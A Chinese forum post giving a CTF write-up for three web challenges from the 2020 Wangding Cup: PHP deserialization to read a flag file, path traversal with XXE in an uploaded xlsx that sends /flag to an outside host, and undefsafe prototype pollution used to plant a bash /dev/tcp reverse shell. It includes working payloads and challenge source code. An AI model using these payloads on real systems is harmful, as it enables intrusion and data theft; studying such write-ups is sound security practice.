查看: 620|回复: 3

[Web] 网鼎杯2020青龙组 web writeup

[复制链接]
发表于 2020-5-11 11:29:16 | 显示全部楼层 |阅读模式
  上午压根没web,而且签到题有问题,又不能重新下发,愣是看着密码发呆emmm,然后下午才放web,而且一个队只能下发一个docker,就挺拖时间的,搞心态
AreUSerialz  源码
<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();   
    }

    public function process() {
        if($this->op == "1") {
            $this->write();       
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}
  尝试写shell不得行,那就读文件吧

网鼎杯2020青龙组 web writeup

网鼎杯2020青龙组 web writeup

反序列化之前会做逐字判断,ascii必须>=32或<=125
由于这里是protect类型,需要加上%00进行标识
但是%会被过滤,就用十六进制\00和S,然后这里有个弱类型可以用int绕过
  首先需要知道路径,可以查看:
/proc/self/cmdline

网鼎杯2020青龙组 web writeup

网鼎杯2020青龙组 web writeup

得到配置文件路径
/web/config/httpd.conf

网鼎杯2020青龙组 web writeup

网鼎杯2020青龙组 web writeup

O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:62:"php://filter/convert.base64-encode/resource=/web/html/flag.php";S:10:"\00*\00content";N;}

网鼎杯2020青龙组 web writeup

网鼎杯2020青龙组 web writeup

网鼎杯2020青龙组 web writeup

网鼎杯2020青龙组 web writeup
javafile  下载页面处存在路径穿越,可以读到web.xml:/file_in_java/DownloadServlet?filename=../../../../WEB-INF/web.xml

网鼎杯2020青龙组 web writeup

网鼎杯2020青龙组 web writeup

然后挨个下载源码

网鼎杯2020青龙组 web writeup

网鼎杯2020青龙组 web writeup

download这里过滤了flag不能直接下载

网鼎杯2020青龙组 web writeup

网鼎杯2020青龙组 web writeup

upload这里有一个对文件名、后缀是否为excel-开头和xlsx结尾进行的判断

网鼎杯2020青龙组 web writeup

网鼎杯2020青龙组 web writeup

那么应该就是用xlsx让后构造xml文件读flag了,跟用docx里的xml进行xxe是一个道理
https://www.jianshu.com/p/73cd11d83c30
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ip/?%file;'>">
%all;
  xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE data SYSTEM "http://ip/1.dtd">
<data>&send;</data>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/><Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/><Override PartName="/xl/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/xl/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>
  然后上传

网鼎杯2020青龙组 web writeup

网鼎杯2020青龙组 web writeup

监听日志收到flag~

网鼎杯2020青龙组 web writeup

网鼎杯2020青龙组 web writeup

notes  java耗费太多时间了,只审了一遍(加上当时环境经常502),就跟着writeup复现一下
  考点:原型链污染
var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');


var app = express();
class Notes {
    constructor() {
        this.owner = "whoknows";
        this.num = 0;
        this.note_list = {};
    }

    write_note(author, raw_note) {
        this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
    }

    get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

    get_all_notes() {
        return this.note_list;
    }

    remove_note(id) {
        delete this.note_list[id];
    }
}

var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");


app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));


app.get('/', function(req, res, next) {
  res.render('index', { title: 'Notebook' });
});

app.route('/add_note')
    .get(function(req, res) {
        res.render('mess', {message: 'please use POST to add a note'});
    })
    .post(function(req, res) {
        let author = req.body.author;
        let raw = req.body.raw;
        if (author && raw) {
            notes.write_note(author, raw);
            res.render('mess', {message: "add note sucess"});
        } else {
            res.render('mess', {message: "did not add note"});
        }
    })

app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

app.route('/delete_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to delete a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        if (id) {
            notes.remove_note(id);
            res.render('mess', {message: "delete done"});
        } else {
            res.render('mess', {message: "delete failed"});
        }
    })

app.route('/notes')
    .get(function(req, res) {
        let q = req.query.q;
        let a_note;
        if (typeof(q) === "undefined") {
            a_note = notes.get_all_notes();
        } else {
            a_note = notes.get_note(q);
        }
        res.render('note', {list: a_note});
    })

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })

app.use(function(req, res, next) {
  res.status(404).send('Sorry cant find that!');
});

app.use(function(err, req, res, next) {
  console.error(err.stack);
  res.status(500).send('Something broke!');
});

const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))
  代码还是比较清楚
  参考:https://snyk.io/vuln/SNYK-JS-UNDEFSAFE-548940
可知undefsafe包,版本<2.0.3有原型链污染的洞
  由于/status路由下有命令执行

网鼎杯2020青龙组 web writeup

网鼎杯2020青龙组 web writeup

所以可以通过污染commands这个字典,例如令commads.a=whoami也会帮我们遍历执行
  /edit_note下可以传三个参数

网鼎杯2020青龙组 web writeup

网鼎杯2020青龙组 web writeup

传入后会直接写入当前的note_list,为一个字典

网鼎杯2020青龙组 web writeup

网鼎杯2020青龙组 web writeup

就可以利用这点进行污染,
id=__proto__,author=bash -i > /dev/tcp/ip/port 0>&1,raw=123

网鼎杯2020青龙组 web writeup

网鼎杯2020青龙组 web writeup

然后访问/status弹shell:

网鼎杯2020青龙组 web writeup

网鼎杯2020青龙组 web writeup



温馨提示:
1.如果您喜欢这篇帖子,请给作者点赞评分,点赞会增加帖子的热度,评分会给作者加学币。(评分不会扣掉您的积分,系统每天都会重置您的评分额度)。
2.回复帖子不仅是对作者的最好奖励,还可以获得学币奖励,请尊重作者的劳动成果,拒绝做伸手党!
3.发广告、灌水回复等违规行为一经发现直接禁言,如果本帖内容涉嫌违规,请点击论坛底部的举报反馈按钮,也可以在【投诉建议】板块发帖举报。
论坛交流群:672619046

0

主题

148

帖子

0

精华

中级会员

Rank: 8Rank: 8

学币
384
荣耀
0
rank
0
违规
0

    发表于 2020-5-11 15:30:32 | 显示全部楼层
    感谢分享,我会认真学习的!

    0

    主题

    1

    帖子

    0

    精华

    初级会员

    Rank: 4

    学币
    4
    荣耀
    0
    rank
    0
    违规
    0

      发表于 2020-5-14 20:49:49 | 显示全部楼层
      感谢 感谢!
      回复 打印

      使用道具 举报

      0

      主题

      3

      帖子

      0

      精华

      初级会员

      Rank: 4

      学币
      1
      荣耀
      0
      rank
      0
      违规
      0

        发表于 前天 23:45 | 显示全部楼层
        找了好久了,感谢
        微信公众号
        快速回复 返回顶部 返回列表